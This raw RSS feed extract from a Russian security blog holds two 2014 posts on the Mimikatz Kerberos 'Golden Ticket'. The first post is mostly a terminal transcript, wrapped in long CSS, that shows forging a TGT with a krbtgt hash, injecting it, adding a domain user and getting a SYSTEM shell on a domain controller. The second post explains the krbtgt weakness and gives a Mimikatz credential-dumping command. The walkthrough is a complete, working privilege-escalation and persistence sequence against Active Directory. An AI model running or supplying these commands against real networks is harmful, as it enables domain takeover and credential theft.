C:\Temp&amp;gt;&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>[hacking tricks] Mimikatz Golden Ticket</title><link>http://devteev.blogspot.com/2014/03/hacking-tricks-mimikatz-golden-ticket.html</link><category>Active Directory</category><category>hack</category><category>kerberos</category><category>Microsoft</category><category>Mimikatz</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sun, 23 Mar 2014 01:52:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1375428485735949292</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Данная рубрика будет кратко освещать практические примеры реализации тех или иных атак без утомительно долгих вступлений о природе и погоде. Только суть. И в качестве первой заметки под этим тегом речь вновь зайдет о создании &lt;a href="http://devteev.blogspot.ru/2014/03/yep-another-backdoor-in-active.html" target="_blank"&gt;Golden Ticket&lt;/a&gt;. Так получилось, что &lt;a href="http://blog.gentilkiwi.com/" target="_blank"&gt;Benjamin&lt;/a&gt; буквально на днях добавил кусок кода, отвечающий за идентификатор пользователя и список групп, участником которых становится счастливый обладатель золотого билета Kerberos. Этим и предлагаю пользоваться!&lt;br /&gt;
&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;Mimikatz Golden Ticket&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;C:\Temp&amp;gt;whoami /USER&lt;br /&gt;
&lt;br /&gt;
USER INFORMATION&lt;br /&gt;
----------------&lt;br /&gt;
&lt;br /&gt;
User Name       SID&lt;br /&gt;
=============== =============================================&lt;br /&gt;
test\domainuser S-1-5-21-3838653977-3010990090-570996099-1122&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd&lt;br /&gt;
&lt;br /&gt;
PsExec v2.0 - Execute processes remotely&lt;br /&gt;
Copyright (C) 2001-2013 Mark Russinovich&lt;br /&gt;
Sysinternals - www.sysinternals.com&lt;br /&gt;
&lt;br /&gt;
Couldn't access WIN-8D3KWV0CV4T.TEST.LOCAL:&lt;br /&gt;
Access is denied.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net user newuser newpassword /add /domain&lt;br /&gt;
The request will be processed at a domain controller for domain test.local.&lt;br /&gt;
&lt;br /&gt;
System error 5 has occurred.&lt;br /&gt;
&lt;br /&gt;
Access is denied.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;mimikatz&lt;br /&gt;
&lt;br /&gt;
.#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Mar 17 2014 22:27:23)&lt;br /&gt;
.## ^ ##.&lt;br /&gt;
## / \ ##  /* * *&lt;br /&gt;
## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )&lt;br /&gt;
'## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)&lt;br /&gt;
'#####'                                    with  14 modules * * */&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mimikatz # kerberos::golden /admin:Guest /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:ticket.krb /id:500 /groups:513,512,520,518,519&lt;br /&gt;
Admin     : Guest&lt;br /&gt;
Domain    : TEST.LOCAL&lt;br /&gt;
SID       : S-1-5-21-3838653977-3010990090-570996099&lt;br /&gt;
User Id   : 500&lt;br /&gt;
Groups Id : *513 512 520 518 519&lt;br /&gt;
krbtgt    : c1e209654807223d8cb17376fcb70e53&lt;br /&gt;
-&amp;gt; Ticket : ticket.krb&lt;br /&gt;
&lt;br /&gt;
* PAC generated&lt;br /&gt;
* PAC signed&lt;br /&gt;
* EncTicketPart generated&lt;br /&gt;
* EncTicketPart encrypted&lt;br /&gt;
* KrbCred generated&lt;br /&gt;
&lt;br /&gt;
Final Ticket Saved to file !&lt;br /&gt;
&lt;br /&gt;
mimikatz # kerberos::purge&lt;br /&gt;
Ticket(s) purge for current session is OK&lt;br /&gt;
&lt;br /&gt;
mimikatz # kerberos::ptt ticket.krb&lt;br /&gt;
Ticket 'ticket.krb' successfully submitted for current session&lt;br /&gt;
&lt;br /&gt;
mimikatz # exit&lt;br /&gt;
Bye!&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net user newuser newpassword /add /domain&lt;br /&gt;
The request will be processed at a domain controller for domain test.local.&lt;br /&gt;
&lt;br /&gt;
The command completed successfully.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd&lt;br /&gt;
&lt;br /&gt;
PsExec v2.0 - Execute processes remotely&lt;br /&gt;
Copyright (C) 2001-2013 Mark Russinovich&lt;br /&gt;
Sysinternals - www.sysinternals.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows [‚ҐабЁп 6.0.6001]&lt;br /&gt;
(C) Љ®аЇ®а&amp;nbsp;жЁп Њ&amp;nbsp;©Єа®б®дв, 2006. ‚бҐ Їа&amp;nbsp;ў&amp;nbsp; §&amp;nbsp;йЁйҐ­л.&lt;br /&gt;
&lt;br /&gt;
C:\Windows\system32&amp;gt;whoami&lt;br /&gt;
nt authority\system&lt;br /&gt;
&lt;br /&gt;
C:\Windows\system32&amp;gt;&lt;br /&gt;
&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Yep! Another backdoor in Active Directory :: Mimikatz Golden Ticket</title><link>http://devteev.blogspot.com/2014/03/yep-another-backdoor-in-active.html</link><category>Active Directory</category><category>backdoor</category><category>forensic</category><category>Golden</category><category>Microsoft</category><category>Mimikatz</category><category>Ticket</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 22 Mar 2014 05:56:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6354754120794745115</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
В начале этого года Benjamin Delpy aka &lt;a href="http://blog.gentilkiwi.com/" target="_blank"&gt;gentilkiwi&lt;/a&gt; вновь порадовал сообщество очередным исследованием и, как следствие, новым функционалом в своей эпической сборке под названием &lt;a href="http://blog.gentilkiwi.com/mimikatz" target="_blank"&gt;Mimikatz&lt;/a&gt;. Речь идет про использование архитектурных особенностей службы Kerberos в Microsoft Active Directory с целью скрытого сохранения привилегированного доступа над ресурсами домена. Чтобы понять всю ценность раскопок gentilkiwi, стоит освежить свои знания в контексте протокола Kerberos и о его месте в службе каталогов Microsoft.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Что мы помним про Kerberos? Из сухой теории по безопасности припоминается, что это какой-то сетевой протокол аутентификации, изначально спроектированный в недрах &lt;a href="http://web.mit.edu/" target="_blank"&gt;Массачусетского &lt;/a&gt;универа… это что-то болтающееся на контроллерах домена в виде открытого порта 88 и предназначенное для прозрачной авторизации к ресурсам домена. Это "нечто муторное", делающее жизнь администратора сети радостной и беззаботной...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7dOrlzs65WqvSSYHm0uJPwt41Heea_AtMKPcZFOCLNdXzUBLtufCa59uB27Ke-E8nK17Ufq0YfzfeNDhiC1WmZBwJxxDIWd5cXKmmH0Cm13TiR-xWEsqRNAcz6TQ3HgsBqGvSrjcYbMk/s3200/KerberosFULL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7dOrlzs65WqvSSYHm0uJPwt41Heea_AtMKPcZFOCLNdXzUBLtufCa59uB27Ke-E8nK17Ufq0YfzfeNDhiC1WmZBwJxxDIWd5cXKmmH0Cm13TiR-xWEsqRNAcz6TQ3HgsBqGvSrjcYbMk/s3200/KerberosFULL.png" height="740" width="525" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div style="text-align: center;"&gt;
(картинка дернута со &lt;a href="http://ru.wikipedia.org/wiki/Kerberos" target="_blank"&gt;страницы википедии&lt;/a&gt;)&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
&amp;lt;!--&lt;br /&gt;
Я не стану очередным писакой, подробно разжевывающим внутреннее устройство протокола Kerberos. За меня это уже сделали &lt;a href="https://www.google.ru/?gfe_rd=ctrl&amp;amp;ei=_9MsU56QBeuA4ASux4HwCg&amp;amp;gws_rd=cr#newwindow=1&amp;amp;q=kerberos" target="_blank"&gt;100500&lt;/a&gt; раз и куда более грамотные люди. Заполнить пробелы по работе Kerberos можно, например, на страницах &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa378747(v=vs.85).aspx" target="_blank"&gt;TechNet&lt;/a&gt;.&lt;br /&gt;
--&amp;gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Не залезая в дебри протокола, грубо говоря аутентификация в стиле Kerberos базируется на "билетах доступа". Для получения доступа к ресурсу клиент предоставляет свой билет доступа, а ресурс в свою очередь, на основе криптографической магии, верифицирует этот билет доступа и принимает решение, какими правами наделен клиент и наделен-ли он ими вообще. Особую роль во всем этом процессе занимают сервера аутентификации, которые отвечают за выдачу сакральных билетов доступа. В Microsoft Active Directory эту функцию выполняют контроллеры домена.&lt;br /&gt;
&lt;br /&gt;
Начиная с Kerberos четвертой версии появляется такая полезная штука, как TGT (Ticket Granting Ticket — билет для получения билета). Именно эту версию протокола Kerberos штампует корпорация добра в свое решение для централизованного управления сетями, которое впоследствии получает название &lt;a href="http://technet.microsoft.com/ru-ru/windowsserver/dd448614.aspx" target="_blank"&gt;Microsoft Active Directory&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
С первого взгляда все просто замечательно! Разве что &lt;a href="http://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf" target="_blank"&gt;повылезали косяки в реализации&lt;/a&gt;… Хотя у кого их не было? [&lt;a href="http://www.securitylab.ru/vulnerability/203329.php" target="_blank"&gt;тынц&lt;/a&gt;] Сейчас разумеется подобные баги пофикшены и сурьезные компании, которые срослись всеми частями своей ИТ-инфраструктуры с MS AD, могут вздохнуть с облегчением, но…&lt;br /&gt;
&lt;br /&gt;
Копнем несколько глубже в устройство Майкрософт Kerberos и окажется, что вся пирамида с билетами доступа строится на основе одного пользователя – &lt;b&gt;&lt;u&gt;krbtgt&lt;/u&gt;&lt;/b&gt;, а еще точнее, вся криптомагия с билетами завязана на NTLM-хеш этого пользователя. То есть, счастливый обладатель правильной 32-х битной последовательностью символов получает безграничные привилегии ко всем имеющимся в домене ресурсам т.к. способен выписывать билеты Kerberos с любым уровнем доступа. И это не является уязвимостью! Так устроен протокол аутентификации Kerberos.&lt;br /&gt;
&lt;br /&gt;
А теперь задумаемся, как часто этот основополагающий "секрет" (пароль пользователя krbtgt) меняют? Смешно, но ни у одной известной мне компании в регламентах по безопасности не встречается упоминания про смену пароля пользователю krbtgt. То есть, самый важный "ключ" к Active Directory, с помощью которого происходит отруливание всей авторизацией к информационным ресурсам предприятия создается единожды (при создании нового домена) и не меняется на протяжении всего времени его существования.&lt;br /&gt;
&lt;br /&gt;
На это собственно и обратил внимание gentilkiwi, что побудило его запилить &lt;a href="http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos" target="_blank"&gt;новый функционал &lt;/a&gt;в Mimikatz. Так появилась функция генерации условно бессрочного TGT билета, выписанного на идентификатор встроенного администратора системы (SID 500). Прелесть этого TGT билета в том, что даже &lt;b&gt;при условии, когда используемая учетная запись будет заблокирована или отключена, аутентификация по Kerberos будет работать&lt;/b&gt;! Отсутствие возможности использовать дополнительных условий ограничения доступа в отношении встроенной учетной записи администратора с SID 500 такие, например, как ограничение доступа по времени, открывают отличные перспективы для атакующего. Кроме того, &lt;b&gt;для подгрузки TGT билета в адресное пространство операционной системы не требуется высоких привилегий &lt;/b&gt;администратора или системы, достаточно обычных прав доменного пользователя. Для создания волшебного билета Kerberos, открывающего все двери к ресурсам домена, потребуется увести используемый NTLM-хеш пользователя krbtgt.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: right;"&gt;
&lt;i&gt;«Трудно быть Богом, но кто-то же должен им быть…» (с)&lt;/i&gt;&lt;/div&gt;
&lt;br /&gt;
Итак, для полной концепции Бога в адешечке нам понадобится:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;NTLM-хеш пользователя krbtgt&lt;/li&gt;
&lt;li&gt;Имя-домена и его SID&lt;/li&gt;
&lt;li&gt;Компутер под управлением Windows, являющийся участником целевого домена&lt;/li&gt;
&lt;/ul&gt;
Для выполнения первого условия необходимо либо наличие актуальной резервной копии Active Directory, либо соответствующие права в домене, позволяющие сделать такую копию [&lt;a href="https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/" target="_blank"&gt;ссылка&lt;/a&gt;]. Как вариант это можно провернуть с использованием того-же Mimikatz:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;mimikatz.exe "privilege::debug" "lsadump::samrpc /patch" exit&lt;/b&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&amp;lt;!--&lt;br /&gt;К пробегающим сейчас мыслям у воодушевленного читателя о возможном бруте пароля пользователя krbtgt. Сделать этого не получится, т.к. за его безопасность отвечает харкоженная в AD функция, которая срабатывает при любой операции с паролем этого пользователя, генерирует случайную последовательность из 16-ти символов юникод и устанавливает ее в качестве нового пароля. То есть, если вы попытаетесь сбросить пароль пользователю krbtgt, скажем на "123", то будьте уверены, что адешечка подсунет ему свой секурный пароль, не допустив тем самым порождения очередной дырки.&lt;br /&gt;--&amp;gt;&lt;/blockquote&gt;
